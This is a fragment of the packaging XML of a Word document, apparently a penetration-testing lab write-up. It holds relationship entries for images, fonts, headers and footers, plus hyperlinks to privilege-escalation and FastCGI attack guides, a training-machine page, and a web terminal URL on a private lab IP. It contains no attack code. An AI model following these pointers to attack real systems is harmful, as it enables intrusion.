Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/linux-unix/privilege-escalation" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.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book.hacktricks.xyz/pentesting/9000-pentesting-fastcgi" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/training/training-machines/21" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/HLSiira/Atheos-Terminal" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://172.31.30.153/workspace/notadmin/terminal.php" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://t9007105134.p.clickup-attachments.com/t9007105134/34323d2f-7458-43ae-8cdd-f5921af9e7e1/cut.mp4" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/></Relationships>
</file>

<file path=word/_rels/fontTable.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-regular.ttf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-bold.ttf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-italic.ttf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-boldItalic.ttf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-italic.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-bold.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-boldItalic.ttf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-regular.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 Id="rId2"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2.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0rousWf9RfNsxZv/imjEKP4U6Ow==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLnFkcGh1Yjhza2M2MzIOaC53ZnJ5ZmNhaXh4MXUyDmgucDc1aXI3bmtybnc0Mg5oLmMycmpoc3c4YnB0ODINaC44Ym1wNHNoaDk2dzIOaC4zNzQyYXhuY3pnN3gyDmguY29mOXptMzRvanNsMg5oLjF1azh5YThrbXNoZzIOaC4xNzVmNWNzOTR6MG84AHIhMUN0WW5WMzVYbExfdlN2SU5fNmdpcVV3bVFBTmpPRkt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